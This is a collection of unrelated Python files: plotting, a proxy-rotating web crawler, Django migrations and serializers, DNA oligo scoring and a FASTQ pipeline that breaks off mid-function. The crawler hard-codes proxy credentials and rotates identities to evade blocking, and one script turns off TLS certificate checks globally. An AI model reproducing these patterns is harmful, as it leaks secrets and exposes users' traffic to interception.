            self.plots[channel].viewTransformChanged()
    def _selected_y_unit_changed(self, unit):
        self.plot_widget.setLabel('left', self.y_units[unit], units=SI_ACR.get(self.y_units[unit], unit))
        self.selected_y_unit = unit
        for channel in self.plots.keys():
            self.plots[channel].viewTransformChanged()
    def _x_units_changed(self):
        # New unit table: fall back to the first x unit.
        self._selected_x_unit_changed(0)
    def _y_units_changed(self):
        # New unit table: fall back to the first y unit.
        self._selected_y_unit_changed(0)
    def start_stop(self, starting):
        logger.info('start_stop')
        if starting is True:
            self.index = 0
    def add_data(self, data):
        """Append one sample per channel and refresh the visible curves.

        *data* maps channel name -> (x_values, y_values), where each of the
        two entries is indexed by the unit positions in x_units/y_units.
        """
        # logger.info('add_data %s', data)
        if self.index >= self.plot_size:
            # Buffer full: grow it by another DATA_LINES columns.
            lines = np.shape(self.data)[0]
            self.data = np.concatenate((self.data, np.zeros(shape=(lines,
                                       DATA_LINES), dtype=np.float32)), axis=1)
            self.plot_size = self.plot_size + DATA_LINES
        #        self.controller.plotting_allowed = False
        rows_inc = 0
        #        self.plot_widget.enableAutoRange(False, False)
        #        logging.getLogger(__name__).info('plots.keys: %s', self.controller.time_plot.plots.keys())
        for channel in self.plots.keys():
            channel_data = data[channel]
            channel_data_x = channel_data[0]
            channel_data_y = channel_data[1]
            # x_units/y_units keys are integer row offsets within this
            # channel's band of rows (rows_inc .. rows_inc+plot_increment).
            for key in self.x_units:
                self.data[key + rows_inc][self.index] = channel_data_x[self.x_units[key]]
            for key in self.y_units:
                #   try:
                self.data[key + len(channel_data_x) + rows_inc][self.index] = channel_data_y[self.y_units[key]]
                #   except KeyError:
                #       self.controller.time_plot.plots[channel][0].visible = False
                #   else:
                #       self.controller.time_plot.plots[channel][0].visible = True
            self.plots[channel].setData(x=self.data[rows_inc + self.selected_x_unit][:self.index],
                                        y=self.data[rows_inc + len(channel_data_x) + self.selected_y_unit][:self.index])
            rows_inc += self.plot_increment
        #      self.controller.data[rows_inc][self.controller.index] = data['gasmixer'][1].values()[0]
        self.index += 1
        # self.plot_widget.autoRange()
        # self.updatePlot()
        # self.controller.data_updated = True
        # self.controller.plotting_allowed = True
        # logging.getLogger(__name__).info('controller.data %s', self.controller.data)
#
#    def updatePlot(self):
#        for key, value in self.plots.items():
#            if value.opts['name'] == key:
#                value.setData(x=
#
# Manual test: show the pane standalone with its default (empty) traits.
if __name__ == '__main__':
    p = PlotPanel()
    p.configure_traits()
|
import time
from fake_useragent import UserAgent
from retrying import retry
import requests
from lxml import etree
from pymongo import MongoClient
# Generic crawler helpers shared by the site-specific spiders.
class Common_Spider(object):
    """Reusable crawling utilities: random User-Agent headers, proxied HTTP
    requests, lxml parsing, and MongoDB persistence."""

    # Return a random User-Agent header value.
    @staticmethod
    def get_random_ua():
        ua = UserAgent()
        agent = ua.random
        return agent
    # Issue an HTTP request; the retry decorator re-issues it if it raises.
    @retry
    def make_a_request(self, url, data_type,waiting_time=0,is_proxy_pool=False):
        headers = {
            'User-Agent': self.get_random_ua(),
            'Referer':'http://www.dianping.com/guangzhou/ch85/g235',
            # 'Cookie':'_lxsdk_cuid=169fae07440c8-085074ba2ec85c-3c604504-1fa400-169fae07440c8; _lxsdk=169fae07440c8-085074ba2ec85c-3c604504-1fa400-169fae07440c8; _hc.v=bd91c4b0-1aa4-06e6-b09a-3e3e041530eb.1554692212; _lx_utm=utm_source%3DBaidu%26utm_medium%3Dorganic; s_ViewType=10; cy=1500; cye=boluo; _lxsdk_s=169fb8682aa-300-0c8-cdb%7C%7C843'
        }
        # Optional throttle before the request goes out.
        time.sleep(waiting_time)
        # Whether to use the local IP pool (its flask service must already
        # be running); otherwise fall back to the paid tunnel proxy below.
        if is_proxy_pool:
            proxy_url = 'http://0.0.0.0:5555/random'
            rst = requests.get(proxy_url)
            proxy = rst.text
            ip = {
                'http': proxy,
                'https': proxy
            }
            rst = requests.get(url, headers=headers, proxies=ip, timeout=3)
        else:
            # targetUrl = "http://test.abuyun.com"
            # targetUrl = "http://proxy.abuyun.com/switch-ip"
            # targetUrl = "http://proxy.abuyun.com/current-ip"
            # Proxy server
            proxyHost = "http-dyn.abuyun.com"
            proxyPort = "9020"
            # Proxy tunnel credentials.
            # SECURITY: paid-proxy credentials are hard-coded in source;
            # they belong in configuration or environment variables.
            proxyUser = "HDVPA67NY314087D"
            proxyPass = "55DEA9FC8386E5D8"
            proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
                "host": proxyHost,
                "port": proxyPort,
                "user": proxyUser,
                "pass": proxyPass,
            }
            proxies = {
                "http": proxyMeta,
                "https": proxyMeta,
            }
            rst = requests.get(url,headers=headers,proxies=proxies,timeout=0.5)
        # print(rst.status_code)
        # Return the payload in the representation the caller asked for.
        if data_type == 'text':
            return rst.text
        elif data_type == 'content':
            return rst.content.decode()
        elif data_type == 'bytes':
            return rst.content
        else:
            raise Exception('plz enter specified type')
    # Parse raw str/bytes data into an lxml HTML element tree.
    def get_html_from_data(self,data):
        if isinstance(data,str) or isinstance(data,bytes):
            html = etree.HTML(data)
            return html
        else:
            raise Exception('数据类型应为str或bytes')
    # Locate elements with an XPath expression.
    def get_data_by_xpath(self,html,locating_syntax,is_single=True):
        rst = html.xpath(locating_syntax)
        # Return the whole list, or only the first hit ('/' when empty).
        if is_single:
            return rst[0] if len(rst) != 0 else '/'
        else:
            return rst
    # Persist a dict (or list of dicts) into the given MongoDB collection.
    def save_data_by_mongodb(self,data,db_name,collection_name):
        client = MongoClient('localhost',27017)
        db = client[db_name][collection_name]
        if isinstance(data,list):
            for i in data:
                db.insert(i)
            print('插入数据成功')
        elif isinstance(data,dict):
            db.insert(data)
            print('插入数据成功')
        else:
            raise Exception('数据类型应为list或str')
class GlobalVars(dict):
    """Process-wide singleton dict for sharing global state."""

    def __new__(cls, *args, **kwargs):
        # Lazily create the one shared instance on first construction.
        try:
            return cls.__instance
        except AttributeError:
            instance = super().__new__(cls, *args, **kwargs)
            instance.need_init = True
            cls.__instance = instance
            return instance

    def __init__(self, *args, **kwargs):
        # Populate the mapping only the first time GlobalVars() is called;
        # later constructions return the shared instance untouched.
        if self.need_init:
            self.need_init = False
            super().__init__(*args, **kwargs)
class Result:
    """Singleton accumulator for space-separated output text."""

    def __new__(cls, *args, **kwargs):
        # Lazily create the one shared instance on first construction.
        try:
            return cls.__instance
        except AttributeError:
            instance = super().__new__(cls, *args, **kwargs)
            instance.need_init = True
            cls.__instance = instance
            return instance

    def __init__(self):
        # Initialise the buffer exactly once across all constructions.
        if self.need_init:
            self.need_init = False
            self.res = ''

    def add(self, val):
        """Append *val* — or every element of a list/tuple/set — to the
        buffer, space-separated unless the buffer ends with a newline."""
        sep = "" if not self.res or self.res.endswith("\n") else " "
        if isinstance(val, (list, tuple, set)):
            text = ' '.join(str(item) for item in val)
        else:
            text = str(val)
        self.res += sep + text

    def flush(self):
        """Discard all accumulated text."""
        self.res = ''
|
from urllib import request,parse
import ssl
# SECURITY: disabling certificate verification globally exposes every HTTPS
# request in this process to man-in-the-middle attacks; it is presumably here
# because 12306's certificate chain failed validation — confirm before keeping.
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://www.12306.cn/mormhweb"
rsp = request.urlopen(url)
html = rsp.read().decode()
print(html)
|
# Generated by Django 3.1.1 on 2020-10-12 04:59
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: alter qapair.question to CharField(max_length=150)."""
    dependencies = [
        ('polls', '0002_auto_20201012_0018'),
    ]
    operations = [
        migrations.AlterField(
            model_name='qapair',
            name='question',
            field=models.CharField(max_length=150),
        ),
    ]
|
from .models import *
from rest_framework import serializers
# from django.db import models
class UserSerializer(serializers.ModelSerializer):
    """Expose the basic identity fields of the User model."""
    class Meta:
        model=User
        fields=['id','username','first_name','last_name','email']
class TeacherSerializer(serializers.ModelSerializer):
    """Serialize every field of Teacher."""
    # teacher_name=UserSerializer(read_only=True,many=True)
    class Meta:
        model=Teacher
        fields='__all__'
class StudentSerializer(serializers.ModelSerializer):
    """Serialize every field of Student."""
    # student_name=UserSerializer(read_only=True,many=True)
    class Meta:
        model=Student
        fields='__all__'
        # read_only_fields = ['roll_no','user']
class CourseSerializer(serializers.ModelSerializer):
    """Serialize Course with read-only nested teacher and member details."""
    teacher_details=TeacherSerializer(read_only=True,many=True,source='teacher')
    student_details=StudentSerializer(read_only=True,many=True,source='members')
    class Meta:
        model=Course
        fields='__all__'
class StudentCourseSerializer(serializers.ModelSerializer):
    """Serialize every field of the StudentCourse link model."""
    class Meta:
        model=StudentCourse
        fields='__all__'
class AssessmentSerializer(serializers.ModelSerializer):
    """Serialize every field of Assessment."""
    class Meta:
        model=Assessment
        fields='__all__'
class StudentDetailSerializer(serializers.ModelSerializer):
    """Student detail view: nested user plus course names as strings."""
    courses=serializers.StringRelatedField(many=True,read_only=True)
    user=UserSerializer(read_only=True)
    class Meta:
        model=Student
        fields='__all__'
        # depth=1
class TeacherDetailSerializer(serializers.ModelSerializer):
    """Teacher detail view: nested user plus course names as strings."""
    courses=serializers.StringRelatedField(many=True,read_only=True)
    user=UserSerializer(read_only=True)
    class Meta:
        model=Teacher
        fields='__all__'
        # depth=1
|
# -*- coding: utf-8 -*-
import re, sys
import pywrapfst, pynini
from pywrapfst import Fst
sys.path.append('../../fst')
from fst import fst_config, fst
from fst.fst import FST, Transition
# Special symbols used when building the acceptors.
epsilon = 'ε'
marker = '•'
wildcard = '□'
segments = ['t', 'r', 'i', 's', 'u', 'm']
# Stem acceptor: '•' after a symbol marks states where arbitrary segment
# material may be inserted.
stem_str = '>• t r• i s t i• <'
stem = fst.linear_acceptor(stem_str)
T = stem.T.copy()
for t in T:
    if re.search(marker, t.olabel):
        # At each marked position, add self-loops that emit any segment
        # (input epsilon), allowing insertions of unbounded length.
        for segment in segments:
            stem.T.add(Transition(
                src=t.dest, ilabel=epsilon, olabel=segment, dest=t.dest))
# Strip the markers now that the insertion loops have been added.
for t in stem.T:
    t.ilabel = re.sub(marker, '', t.ilabel)
    t.olabel = re.sub(marker, '', t.olabel)
print(stem)
fst.draw(stem, 'stem.dot')
# Candidate surface form; intersecting it with the stem machine yields the
# alignment between the two.
output_str = '> t r u m i s t i <'
output = fst.linear_acceptor(output_str)
print(output)
align = fst.intersect(stem, output)
print(align)
fst.draw(align, 'align.dot')
#stem = '>tristi<'
#fst_stem = pynini.acceptor(stem, token_type="utf8")
#print(fst_stem.print())
#print(fst_stem.input_symbols())
|
from django.test import Client
from django.urls import reverse
import unittest
# Shared Django test client for all tests in this module.
client = Client()
class TestResizeURLs(unittest.TestCase):
    """Smoke test for the project's URL routing."""
    def test_index(self):
        # The index view should answer a plain GET with HTTP 200.
        response = client.get('/')
        self.assertEqual(response.status_code, 200)
if __name__ == '__main__':
    unittest.main()
import zipfile
import numpy as np
def extract_bits(filename):
    """Return the contents of *filename* as a flat array of bits.

    If the file is a zip archive, the first member is read; otherwise the
    raw file bytes are used.

    :param filename: path to a plain or zipped binary file
    :return: numpy uint8 array of 0/1 values, 8 per input byte (MSB first)
    """
    if zipfile.is_zipfile(filename):
        # "with" closes the archive handle, which the original leaked.
        with zipfile.ZipFile(filename) as zp:
            raw_buffer = zp.read(zp.filelist[0])
        data = np.frombuffer(raw_buffer, dtype=np.uint8)
    else:
        # Renamed from "bytes", which shadowed the builtin type.
        data = np.fromfile(filename, dtype=np.uint8)
    return np.unpackbits(data)
if __name__ == "__main__":
    # Use the print() call form: the original Python 2 print statement is a
    # SyntaxError on Python 3, and the call form works on both.
    print(len(extract_bits("smb.nes")))
|
from multiprocessing import Pool
from CellStoch import *
def f(mode):
    """Run one stochastic cell-line simulation batch; `mode` is ignored
    (kept so Pool.map can pass an argument)."""
    model = sinIR_full()
    model.min_gr = 0.25
    model.sim_cell_lines(setting='dc', mode="n100", minimal_time_interval=0.1,
                         max_time=30, num_of_lines=500, resume=False,
                         save_name='dc_fix_t6')
if __name__ == '__main__':
    # Fan the (single) job out over a worker pool; f ignores its argument.
    with Pool(8) as p:
        print(p.map(f, ['dc']))
'''
def sample_lines(save_name,numbers,species):
plt.clf()
m=sinIR_full(minimal_time_interval=0.1)
for i in numbers:
full_dynamics=m.__get_pkl_data__(save_name,i)
time=[t-3 for t in full_dynamics['time']]
c=full_dynamics[species]
plt.plot(time,c)
plt.xlabel('time')
plt.xlim([2,16])
plt.ylabel('number')
imgname=save_name+"_sample.png"
plt.savefig(os.path.join(m.analyze_dir,imgname))
sample_lines("test_clines_wt",[68,69,85,86,67,68,105],'SlrR_d')
sample_lines("test_clines_da",[68,69,85,86,67,68,105],'SlrR_d')
sample_lines("test_clines_ds",[1,2,3,4,5,82,116],'SlrR_d')
sample_lines("test_clines_dc",[1,2,3,4,5,82,116],'SlrR_d')
'''
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from SellBuy.models import CurrentUserHolding, UserShareQuantity
from django.shortcuts import render
from LoginRegister.models import UserDetail
from django.http import JsonResponse
from Helpers.utils import get_or_none
from django.contrib.auth.models import User
# Create your views here.
def leaderboard(request):
    """Render the leaderboard page shell."""
    template = 'LeaderBoard/leaderboard.html'
    return render(request, template)
def leaderboard_update(request):
    """Return the leaderboard as JSON, ranked by total holdings.

    A user's total holdings are their cash balance (current_holding) plus
    the current market value of every share position they hold.
    """
    holdings = CurrentUserHolding.objects.order_by('current_holding').reverse()
    leaderboard_list = []
    for obj in holdings:
        total_holdings = obj.current_holding
        # Add the market value of each share position (price * quantity).
        for user_share in UserShareQuantity.objects.filter(user=obj.user):
            total_holdings += round(user_share.share.current_price * user_share.quantity, 2)
        leaderboard_list.append({
            "username": obj.user.username,
            "holding": round(total_holdings, 2),
            "index": 0,
        })
    # Highest holdings first; sort in place instead of building a copy.
    # The sort is stable, so the query ordering above still breaks ties.
    leaderboard_list.sort(key=lambda entry: entry['holding'], reverse=True)
    # Assign 1-based ranks with enumerate instead of a manual counter.
    for rank, entry in enumerate(leaderboard_list, start=1):
        entry['index'] = rank
    return JsonResponse({"success": True, "data": leaderboard_list}, safe=False)
from tkinter import *
from Point import *
class Rectanguloid:
    """Draws a wireframe box: two offset rectangles joined at the corners."""

    def __init__(self, p1, p2, change_x=25, change_y=40):
        """Open a Tk window and draw the rectanguloid spanning p1..p2.

        change_x / change_y set the depth offset of the back face; the
        defaults preserve the original fixed 25 / 40 offsets.
        """
        window = Tk()
        window.title("Rectanguloid")
        canvas = Canvas(window, width=200, height=250, bg="white")
        canvas.pack()
        x1, y1 = p1.getX(), p1.getY()
        x2, y2 = p2.getX(), p2.getY()
        # Front face and offset back face.
        canvas.create_rectangle(x1, y1, x2, y2)
        canvas.create_rectangle(x1 + change_x, y1 + change_y,
                                x2 + change_x, y2 + change_y)
        # Join each corner of the front face to the matching back corner.
        for cx, cy in ((x1, y1), (x1, y2), (x2, y1), (x2, y2)):
            canvas.create_line(cx, cy, cx + change_x, cy + change_y)
        # Fix: enter the Tk event loop so the window actually stays on
        # screen when the module is run as a script.
        window.mainloop()
# Build and display a sample rectanguloid when the module is run.
Rectanguloid(Point(10, 75), Point(125, 175))
|
from utils import regex_utils
class WhitelistMatcher:
    """Matches URLs against the regex whitelist provided by a model."""

    def __init__(self, model):
        self.model = model

    def get_match(self, **args) -> str:
        """Return the first whitelist regex that matches args['url'], or ''."""
        for item in self.model.get_whitelist(args):
            if regex_utils.is_match_regex(item.regex, args['url']):
                return item.regex
        return ""
|
import string
import math
import re
import seq
def calcscore(inscore, k, newSD):
    """Fold one more score into a running average of k previous scores."""
    combined = inscore * k + newSD
    return combined / (k + 1)
def sequenceOkay(strg, search=re.compile('[^aAcCgGtT]').search):
    """Return True if all characters are valid [aAcCgGtT] in sequence."""
    # A match on the negated class means an invalid character exists.
    return search(strg) is None
def TmScore(sequence):
    """Squared distance of the sequence's Tm from the 67.5 C target.

    Sequences with invalid (non-ACGT) characters score infinity.
    """
    if not sequenceOkay(sequence):
        return float('Inf')
    return (Tm(sequence.lower()) - 67.5) ** 2
def TmScore_Tm(sequence, targetTm):
    """Squared distance of the sequence's Tm from targetTm (inf if invalid)."""
    if not sequenceOkay(sequence):
        return float('Inf')
    return (Tm(sequence.lower()) - targetTm) ** 2
def TmScore_RNA_DNA(sequence, targetTm, targetRange):
    """Score a sequence by squared distance of its RNA-DNA Tm from targetTm.

    Returns infinity when the sequence contains invalid characters or when
    its Tm falls outside targetRange = (low, high).
    """
    if not sequenceOkay(sequence):
        return float('Inf')
    # Compute the Tm once instead of three times as before.
    tm = Tm_RNA_DNA(sequence.lower())
    if tm < targetRange[0] or tm > targetRange[1]:
        return float('Inf')
    return (tm - targetTm) ** 2
def Tm_RNA_DNA(sequence):
    """Return dG (kcal/mol at 37 C) of a lowercase sequence using the
    RNA-DNA nearest-neighbor tables below.

    NOTE(review): despite the name, this returns a free energy, not a
    melting temperature — the Tm formula is left commented out below.
    """
    # Nearest-neighbor enthalpy (kcal/mol) and entropy (cal/mol/K) tables.
    delH = {'aa':-7.8, 'ac':-5.9, 'ag':-9.1, 'at':-8.3,
            'ca':-9.0, 'cc':-9.3, 'cg':-16.3,'ct':-7.0,
            'ga':-5.5, 'gc':-8.0, 'gg':-12.8,'gt':-7.8,
            'ta':-7.8, 'tc':-8.6, 'tg':-10.4,'tt':-11.5}
    delS = {'aa':-21.9, 'ac':-12.3, 'ag':-23.5, 'at':-23.9,
            'ca':-26.1, 'cc':-23.2, 'cg':-47.1, 'ct':-19.7,
            'ga':-13.5, 'gc':-17.1, 'gg':-31.9, 'gt':-21.6,
            'ta':-23.2, 'tc':-22.9, 'tg':-28.4, 'tt':-36.4}
    # Sum stacking contributions over every dinucleotide step.
    # (Removed unused primerConc/temp/salt locals and dead dH=0/dS=0 inits.)
    dH = sum(delH[sequence[i:i + 2]] for i in range(len(sequence) - 1))
    dS = sum(delS[sequence[i:i + 2]] for i in range(len(sequence) - 1))
    # Initiation terms.
    dH += 1.9
    dS += -3.9
    # dG = dH - T*dS at 37 C, converted back to kcal/mol.
    dG = (dH * 1000.0 - (37.0 + 273.15) * dS) / 1000
    #ans = dH*1000/(dS + (1.9872 * math.log(primerConc/4))) + (16.6 * math.log10(salt)) - 273.15
    return dG
def Tm(sequence):
    """Return the melting temperature (C) of a lowercase DNA sequence.

    Uses SantaLucia '98 nearest-neighbor parameters, a fixed primer
    concentration (50 uM) and a 16.6*log10(salt) salt correction.
    """
    primerConc = 0.00005  # molar primer concentration
    salt = 0.33           # molar monovalent salt
    # Nearest-neighbor enthalpy (kcal/mol) and entropy (cal/mol/K) tables.
    delH = {'aa':-7.9, 'ac':-8.4, 'ag':-7.8, 'at':-7.2,
            'ca':-8.5, 'cc':-8.0, 'cg':-10.6,'ct':-7.8,
            'ga':-8.2, 'gc':-9.8, 'gg':-8.0, 'gt':-8.4,
            'ta':-7.2, 'tc':-8.2, 'tg':-8.5, 'tt':-7.9}
    delS = {'aa':-22.2, 'ac':-22.4, 'ag':-21.0, 'at':-20.4,
            'ca':-22.7, 'cc':-19.9, 'cg':-27.2, 'ct':-21.0,
            'ga':-22.2, 'gc':-24.4, 'gg':-19.9, 'gt':-22.4,
            'ta':-21.3, 'tc':-22.2, 'tg':-22.7, 'tt':-22.2}
    # Sum stacking contributions over every dinucleotide step.
    # (Removed unused `temp` local and dead dH=0/dS=0 inits.)
    dH = sum(delH[sequence[i:i + 2]] for i in range(len(sequence) - 1))
    dS = sum(delS[sequence[i:i + 2]] for i in range(len(sequence) - 1))
    # Terminal initiation corrections depend on whether each end is G/C
    # or A/T; the loop replaces the duplicated if/else blocks.
    for end in (sequence[0], sequence[-1]):
        if end in ('c', 'g'):
            dH += 0.1
            dS += -2.8
        else:
            dH += 2.3
            dS += 4.1
    ans = dH * 1000 / (dS + (1.9872 * math.log(primerConc / 4))) \
        + (16.6 * math.log10(salt)) - 273.15
    return ans
def GCScore(sequence):
    """Squared distance of the GC fraction from the 0.45 target (inf if invalid)."""
    if not sequenceOkay(sequence):
        return float('Inf')
    return (seq.percentGC(sequence) - .45) ** 2
def findGoodness(inseq, oligolen, blocklen, scoreFun):
    """Score every candidate oligo window of inseq with scoreFun.

    Lower is better (the "goodness" is really a badness). `blocklen` is
    unused here; it is kept for signature parity with the other
    findGoodness_* variants. NOTE(review): the last window, starting at
    len(inseq)-oligolen, is never scored (range excludes it) — behavior
    preserved from the original.
    """
    return [scoreFun(inseq[i:i + oligolen])
            for i in range(len(inseq) - oligolen)]
def findGoodness_Tm(inseq, oligolen, blocklen, scoreFun, targetTm):
    """Score every candidate oligo window with scoreFun(window, targetTm).

    Lower is better; `blocklen` is unused and kept for signature parity
    with the other findGoodness_* variants.
    """
    return [scoreFun(inseq[i:i + oligolen], targetTm)
            for i in range(len(inseq) - oligolen)]
def findGoodness_RNA_DNA(inseq, oligolen, blocklen, scoreFun, targetTm, targetRange):
    """Score every candidate oligo window with
    scoreFun(window, targetTm, targetRange).

    Lower is better; `blocklen` is unused and kept for signature parity
    with the other findGoodness_* variants.
    """
    return [scoreFun(inseq[i:i + oligolen], targetTm, targetRange)
            for i in range(len(inseq) - oligolen)]
def findOligos(noligos, inseq, goodness, oligolen, blocklen):
    """Dynamic program selecting up to `noligos` non-overlapping oligos.

    Run a findGoodness* variant first to obtain per-position `goodness`.
    Returns one entry per oligo count n=1..N (N capped where the averaged
    score stays < 100); each entry is [score, match positions, oligos].
    """
    # This is the main function to find oligos
    # First, you have to run findGoodness to get the oligo scores
    # The return value is a list of lists with 3 elements
    # Each element of this list is the solution for n=1,2,3...noligos
    # For each element of the list, the 3 elements are as follows:
    # First element are the scores, second element is the matches
    # third element are the oligos.
    # Define a few constants
    nan = float('Nan')
    inf = float('Inf')
    # Length of oligo plus the "blocked" area
    shortlen = oligolen + blocklen
    goodlen = len(inseq) - oligolen
    # Initialize the 2D arrays
    # bmsf presumably = "best match so far": bmsfpos[x][k] is the position
    # of the last oligo in the best (k+1)-oligo solution using positions
    # <= x, and bmsfsco[x][k] its running-average score — TODO confirm.
    bmsfpos = [[]]
    bmsfsco = [[]]
    # Initialize the values assuming the first oligo is the best match at length 0
    bmsfpos[0] += [0]
    bmsfsco[0] += [goodness[0]]
    for i in range(noligos-1):
        bmsfpos[0] += [nan]
        bmsfsco[0] += [inf]
    for x in range(1,len(goodness)):
        # First, let's copy in the best solution from the previous iteration
        bmsfpos += [list(bmsfpos[x-1])]
        bmsfsco += [list(bmsfsco[x-1])]
        for k in range(noligos):
            potentialscore = inf
            if k==0:
                potentialscore = goodness[x]
            else:
                # A k-th oligo at x needs a (k-1)-oligo solution ending at
                # least `shortlen` positions earlier.
                if (x >= shortlen):
                    if bmsfpos[x-shortlen][k-1] >= 0:
                        potentialscore = calcscore(bmsfsco[x-shortlen][k-1],k,goodness[x])
            if potentialscore < bmsfsco[x][k]:
                bmsfpos[x][k] = x
                bmsfsco[x][k] = potentialscore
    # Okay, now we have to read out the oligos
    allmatches = []
    allscores = []
    for k in range(noligos):
        matches = []
        x = goodlen - 1
        currk = k
        if not(math.isnan(bmsfpos[x][currk])):
            allscores += [bmsfsco[x][currk]]
            # Walk the chain of chosen positions backwards.
            for counter in range(k+1):
                prevmatch = bmsfpos[x][currk]
                matches += [prevmatch]
                x = prevmatch-shortlen
                currk -= 1
            matches.reverse()
            allmatches += list([matches])
    # Let's find the maximum number of oligos
    # (the largest n whose averaged score stays under 100).
    maxpos = 0
    for i in range(len(allscores)):
        if allscores[i] < 100:
            maxpos = i
    allscores = allscores[0:maxpos+1]
    allmatches = allmatches[0:maxpos+1]
    noligos = maxpos + 1
    alloligos = []
    for i in range(noligos):
        currmatches = allmatches[i]
        # Probes are the reverse complement of the matched footprint.
        alloligos += [[seq.reverseComplement(inseq[j:(j+oligolen)]) for j in currmatches]]
    output = []
    for i in range(noligos):
        output += [ [allscores[i], allmatches[i], alloligos[i] ] ]
    return output
def alignOutput(inseq, matches, oligolen):
    """Uses matches from findOligos() to make a nice output w/ probes aligned to inseq
    Returns 3 elements in a list:
    [0] - the inseq
    [1] - the oligos
    [2] - probe # information
    """
    noligos = len(matches)
    # Complement of each probe's footprint on inseq, and a numbered label.
    comps = [seq.complement(inseq[m:(m + oligolen)]) for m in matches]
    labels = [('Probe # ' + str(i + 1)).ljust(oligolen) for i in range(noligos)]
    # Gap before each probe: distance from the end of the previous probe
    # (or from the start of the sequence for the first one).
    gaps = [' ' * matches[0]]
    gaps += [' ' * (matches[i] - matches[i - 1] - oligolen)
             for i in range(1, noligos)]
    compseq = ''.join(g + c for g, c in zip(gaps, comps)).ljust(len(inseq))
    probeseq = ''.join(g + p for g, p in zip(gaps, labels)).ljust(len(inseq))
    return [inseq, compseq, probeseq]
def splitOutput(seqs, width):
    """Interleave fixed-width chunks of several sequences.

    Chunk i of every sequence is emitted before chunk i+1 of any of them,
    so printing one element per line shows the sequences aligned.
    """
    chunked = [split_list(s, width) for s in seqs]
    interleaved = []
    # Iterate by the first sequence's chunk count, like the original.
    for i in range(len(chunked[0])):
        for chunk_list in chunked:
            interleaved.append(chunk_list[i])
    return interleaved

def split_list(seq, length):
    """Split seq into consecutive pieces of at most `length` items."""
    return [seq[i:i + length] for i in range(0, len(seq), length)]
def probeNames(oligos, probeName):
    """Attach the GC percentage and a numbered name to each oligo."""
    labelled = []
    for index, oligo in enumerate(oligos, start=1):
        labelled.append([seq.percentGC(oligo) * 100, oligo,
                         probeName + '_' + str(index)])
    return labelled
def mask_runs(inseq, thechar, runlength, mismatches):
    """Return a 0/1 mask flagging every window of `runlength` characters
    containing at least runlength - mismatches copies of `thechar`."""
    outseq = [0] * len(inseq)
    needed = runlength - mismatches
    for start in range(len(inseq) - runlength + 1):
        window = inseq[start:start + runlength]
        hits = sum(1 for ch in window if ch == thechar)
        if hits >= needed:
            # Flag the whole window, not just its start position.
            outseq[start:start + runlength] = [1] * runlength
    return outseq

def mask_to_badness(mask, mer_length):
    """Give infinite badness to every mer start whose window of
    `mer_length` characters would cover a masked position."""
    inf = float('Inf')
    out = list(mask)
    for pos, flag in enumerate(mask):
        if flag > 0:
            for j in range(max(0, pos - mer_length + 1), pos + 1):
                out[j] = inf
    return out

def mask_oligos_with_runs(inseq, thechar, runlength, mismatches, oligolen):
    """Flag each oligo start whose window contains a qualifying run of
    `thechar` (as judged by mask_runs)."""
    outseq = [0] * len(inseq)
    for start in range(len(inseq) - oligolen + 1):
        window = inseq[start:start + oligolen]
        if any(mask_runs(window, thechar, runlength, mismatches)):
            outseq[start] = 1
    return outseq
def getacgt(inseq):
    """Return the [a, c, g, t] character fractions of inseq (lowercase)."""
    total = float(len(inseq))
    return [inseq.count(base) / total for base in 'acgt']

def bad_acgt(inseq):
    """Return 1 when the c or g fraction is extreme (>= 0.40 or <= 0.10)."""
    fractions = getacgt(inseq)
    c_frac, g_frac = fractions[1], fractions[2]
    extreme = (c_frac >= 0.40 or g_frac >= 0.40 or
               c_frac <= 0.10 or g_frac <= 0.10)
    return 1 if extreme else 0

def GC_badness(inseq, oligolen):
    """Per-start flags: 1 where the oligo window has extreme C/G content."""
    badness = [0] * len(inseq)
    for start in range(len(inseq) - oligolen + 1):
        badness[start] = bad_acgt(inseq[start:start + oligolen])
    return badness
def remove_short_runs(inmask, n, tolerance):
    """Zero out runs of 1s that are too short.

    A position keeps its window inmask[i:i+n] only when that window holds
    at least n - tolerance set entries; e.g. n=20, tolerance=2 keeps runs
    of length >= 18, or length-20 runs with up to two interior gaps.
    """
    out = [0] * len(inmask)
    for start, flag in enumerate(inmask):
        if flag:
            window = inmask[start:start + n]
            if sum(window) >= n - tolerance:
                out[start:start + n] = window
    return out
def convert_mask_to_seq(inseq, mask, chr):
    """Replace characters of inseq with `chr` wherever mask is positive."""
    # NOTE: parameter `chr` shadows the builtin; the name is kept because
    # it is part of the public signature (callers may pass it by keyword).
    chars = list(inseq)
    for pos, flag in enumerate(mask):
        if flag > 0:
            chars[pos] = chr
    return ''.join(chars)
|
# Generated by Django 3.2.13 on 2022-06-28 17:49
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: order Person records by first_name."""

    dependencies = [
        ('contacts_app', '0002_alter_person_unique_together'),
    ]

    operations = [
        # Adjusts the model's Meta options (default ordering) only.
        migrations.AlterModelOptions(
            name='person',
            options={'ordering': ['first_name']},
        ),
    ]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2018-12-27 12:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add session_end flag to UserQuestionAnswer."""

    dependencies = [
        ('edtech', '0003_auto_20181226_2043'),
    ]

    operations = [
        migrations.AddField(
            model_name='userquestionanswer',
            name='session_end',
            # Existing rows get False by default.
            field=models.BooleanField(default=False),
        ),
    ]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Standard library packages.
import re
import sys
from itertools import izip
# Others.
import seeq
from gzopen import gzopen
def trimSuffix(matcher, txt):
    """Return the prefix of txt matched by `matcher`, or '' when absent."""
    prefix = matcher.matchPrefix(txt, False)
    return prefix if prefix else ''
######## Mapping Pipeline ###############################################
def extract_reads_from_PE_fastq(fname_iPCR_PE1, fname_iPCR_PE2):
    """This function takes the 2 pair-end sequencing files and extracts
    the barcode making sure that the other read contains the
    transposon."""
    # This is the scarcode that allows to identify which
    # experiment is sequenced (must be CT). NOTE(review): the `3` is
    # presumably the allowed mismatch/edit distance — confirm with seeq docs.
    matcher = seeq.compile('CGCTAATTAATGGAATCATG', 3)
    # Fix: open the outputs in a with-block so they are flushed and
    # closed even if an error occurs mid-run (they previously leaked).
    with open('CT_TCT.fasta', 'w') as outf1, open('CT_ACG.fasta', 'w') as outf2:
        # There are many errors in the index, especially in the
        # first base. The most frequent errors are hard coded
